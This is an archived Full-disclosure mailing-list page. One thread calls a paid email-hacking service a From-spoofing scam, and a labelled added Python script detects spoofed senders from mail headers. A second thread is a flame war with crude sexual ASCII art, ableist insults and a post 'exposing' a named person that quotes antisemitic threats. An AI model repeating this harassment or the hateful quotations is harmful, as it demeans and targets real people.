When the client is cheated it is too late. Now the owners of the site
have his 20 bucks.

I tested it and the mail doesn't come from a Yahoo server. The
mail comes from bebobox.com.

My English sucks! Sorry

On Mon, Sep 14, 2009 at 7:43 PM, maxigas maxi...@anargeek.net wrote:
 From: mamo mam...@gmail.com
 Subject: Re: [Full-disclosure] Hack-Mail.net or similar site
 Date: Mon, 14 Sep 2009 23:20:24 +0200

 On Sat, Sep 12, 2009 at 7:08 PM, Andrew Farmer andf...@gmail.com wrote:

 So, in other words, they're spoofing From addresses for profit. Clever.

 I never tried them. I will just for fun (with my email address).
 Perhaps they are doing something more smart (like brute forcing with
 dictionary, use some virus or web attack or something else).

 Mamo

 tell us how it went, my guess was also that they are just setting that from= 
 address and that's
 it, so you don't get a working password after all.  but i have no 20$ to test 
 it.  :f

 maxigas



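The check described in the message above (a mail that claims a Yahoo sender but was actually relayed by bebobox.com), as an added example that is not part of the original posts. The sample messages are constructed; `mx.example.org`, the recipient address and the Yahoo host name are assumptions, and only bebobox.com comes from the thread.

```python
import re
from email import message_from_string
from email.utils import parseaddr

TRUSTED_MX = "mx.example.org"  # assumption: host name of our own receiving server

# Constructed sample: From claims yahoo.com, our MX logged a bebobox.com relay.
SPOOFED = """\
Authentication-Results: mx.example.org; spf=softfail smtp.mailfrom=yahoo.com
Received: from mail.bebobox.com (mail.bebobox.com [192.0.2.25])
\tby mx.example.org with ESMTP id abc123
\tfor <client@example.org>; Mon, 14 Sep 2009 20:01:02 +0000
From: "Target Account" <target@yahoo.com>
To: client@example.org
Subject: password recovered

(body omitted)
"""

# Constructed sample: same claimed sender, relay and checks agree with it.
LEGIT = """\
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=yahoo.com; dkim=pass
Received: from out1.mail.yahoo.com (out1.mail.yahoo.com [192.0.2.80])
\tby mx.example.org with ESMTP id def456; Mon, 14 Sep 2009 20:05:00 +0000
From: "Friend" <friend@yahoo.com>
To: client@example.org
Subject: hello

(body omitted)
"""

def org_domain(host):
    """Naive registrable domain: last two labels (real code needs the Public Suffix List)."""
    return ".".join(host.lower().strip(".").split(".")[-2:])

def relay_seen_by_mx(msg, trusted_mx=TRUSTED_MX):
    """Host that connected to our MX, taken from the Received line our MX wrote.

    Only that hop is trustworthy; every Received line below it was supplied by
    the sending side. The reverse-DNS name is preferred over the HELO string.
    """
    pattern = r"from\s+(\S+)(?:\s+\((\S+)\s+\[[^\]]+\]\))?\s+by\s+(\S+)"
    for hop in msg.get_all("Received", []):
        m = re.match(pattern, " ".join(hop.split()), re.I)
        if m and m.group(3).lower() == trusted_mx:
            rdns = m.group(2)
            return rdns if rdns and rdns.lower() != "unknown" else m.group(1)
    return None

def auth_results(msg, trusted_mx=TRUSTED_MX):
    """spf/dkim/dmarc verdicts, but only from headers stamped by our own MX."""
    verdicts = {}
    for value in msg.get_all("Authentication-Results", []):
        authserv, _, rest = " ".join(value.split()).partition(";")
        if authserv.strip().lower() != trusted_mx:
            continue  # written by some other host, so it proves nothing
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", rest, re.I):
            verdicts[method.lower()] = result.lower()
    return verdicts

def assess(raw):
    """Compare the claimed From domain with what our MX actually observed."""
    msg = message_from_string(raw)
    from_dom = org_domain(parseaddr(msg.get("From", ""))[1].rpartition("@")[2])
    relay = relay_seen_by_mx(msg)
    relay_dom = org_domain(relay) if relay else None
    auth = auth_results(msg)
    reasons = []
    # A relay in another domain is only a hint (bulk senders do this too);
    # a DMARC pass means the From domain itself was authenticated.
    if relay_dom and relay_dom != from_dom and auth.get("dmarc") != "pass":
        reasons.append(f"From claims {from_dom} but relay was {relay_dom}")
    for method in ("spf", "dkim", "dmarc"):
        if auth.get(method) in {"fail", "softfail"}:
            reasons.append(f"{method}={auth[method]}")
    return {"from": from_dom, "relay": relay_dom, "auth": auth,
            "suspicious": bool(reasons), "reasons": reasons}

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(name, assess(raw))
```
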


Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-14 Thread Valdis' Mustache
Adrian,

Godwin be damned, I must know! You can't sincerely be a racist or
anti-semite in this day and age, can you? Which is the fool, your
spectators, or you?

My hairs bristle in anticipation at your answer.


Your Humble Servant,
La moustache de Valdis


On 9/14/09, Andrew A glutt...@gmail.com wrote:
 ..
 _ .'  `.
/\)
   / /
  / /   /\
  \ \  /  \
   _   \ \/ /\ \
  (/\   \  /  \ \
   \ \  /  \  (Y )
\ \/ /\ \  
 \  /  \ \
  \/   / /
  / /
 ( Y)
  

 GADI EVRON GONNA CALL THE JIZZTAPO ON ME

 On Mon, Sep 14, 2009 at 11:37 PM, Valdis' Mustache 
 securitas.must...@gmail.com wrote:

 Herr Evron, Ms. Alder, and Dr. Krawetz:

 While your valiant effort at cyberimpersonation is quite laudable, it
 should be noted that mastery of ASCII graphics beyond the level of the
 System V banner command is one (admittedly, non-lexicographically
 fingerprintable) integral hallmark of the departed and
 now-presumably-disbanded security lulz-mill you've attempted to
 mimic, a critical ridge of the digital epidermis that your missive
 fails to capture.

 Indeed, at a minimum, a handful of opportunistically-placed simple
 imagus penii , as below, would have yielded this post some
 authenticity, e.g.:

 8===D

 ) (uncircumcised)

 8=D~~~ (ejaculate included)
  ___
 //  7
(_,_/\
 \\
  \\
  _\\__
 (   \ )
  \___\___/

 (overly-detailed and unrenderable depending on native character set)

 ... Ad infinitum.

 That said, your attempted Internet volleys have touched on a key
 conundrum that has puzzled this mustache for some time wrt. the varied
 and sundry security-centric cyber-Vasićka of the first decade of this
 millennium's latter half.

 Typically, this mustache has found anti-semitism and racism to have
 ironclad utility as field tests for limited reasoning capabilities and
 / or sub-80 Terman-Binet scores within the boundaries of mental
 retardation as proscribed by the DSM-IV.

 And yet... The alleged Mr. Aurenheimer and his [redacted] cohorts are
 demonstrably quite bright!

 The resulting dichotomy has been rather troublesome to this mustache,
 and has kept me awake, oft in spirited debate with my left and right
 Sideburnian peers, on many a balmy autumn evening such as the one now
 upon us.

 At precisely this second (and admittedly bound to revision from moment
 to passing moment), I can only conclude that Monsignor Weev is often
 indeed doing that which he is best regarded for -- provoking a
 visceral and disproportionate reaction in those too cynical to see
 said intent -- when he espouses deeply held beliefs in such laughable
 notions of race, a vein he has (or so it would seem) mined with much
 success for many years.

 I can only presume that (to use the parlance of the fora the young man
 in question is known to frequent) this would indeed make you that
 which is typically described as a lolcow.

 In keeping with the vernacular of the Now, I include this informational
 graphic:

(__)
 (..)
/---\/
  /  ||  ||
 ||-||
 *^^^

 Apropos on numerous levels, the asterix on the far left quadrant does
 indeed denote bullshit.


 Your Humble Servant,
 Вусы Валдзіс



 On 9/14/09, GOBBLES j...@mac.hush.com wrote:
    ___  ___  _ 
  | __ |  | |__] |__] ||___ [__
  |__] |__| |__] |__] |___ |___ ___]
 
   _  _ ___  _ ___  _
  |__| |\ | |  \ | |  \ |
  |  | | \| |__/_| |__/ |___
 
  Presents
  =
 
  Meet the exposed Andrew Aurenheimer. Also known as weev,
  weevlar,
  weevlos, wbeelsoi. Former bantown member and a sysop at
  encyclopediadramatica. He is a failed man. Loyalty to him shall
  bring
  you no benefit. See for yourself:
 
  Law enforcement authorities reportedly have identified a 21-year-
  old Vancouver man as the individual who made two threatening
  telephone calls to Congregation Beth Israel on the night of June 16.
 
  Jewish Federation of Greater Portland Community Relations Director
  Robert Horenstein said the suspect, whose name was not made public,
  “admitted making the calls and the FBI is now working with the U.S.
  Attorney’s office to determine if a crime has been committed.”
 
  The alleged caller, whom authorities described to Horenstein as
  having “low intelligence and no means to carry out any threats,”
  reportedly said over the phone, “The Nazis are coming to get you;
  there will be another Holocaust” and “You killed my Lord. You will
  pay.”
 
  The calls were left on the CBI’s voice mail system and were first
  heard the next morning by Rabbi Michael Cahana.
 
  Cahana said, “I was very, very pleased at the responsiveness of the
  Portland Police and FBI. They gave us a strong sense that they were
  taking this seriously and we were in very good hands.”
 
  The rabbi declined to elaborate on the incident.
 
  Portland FBI spokeswoman Beth Anne Steele said her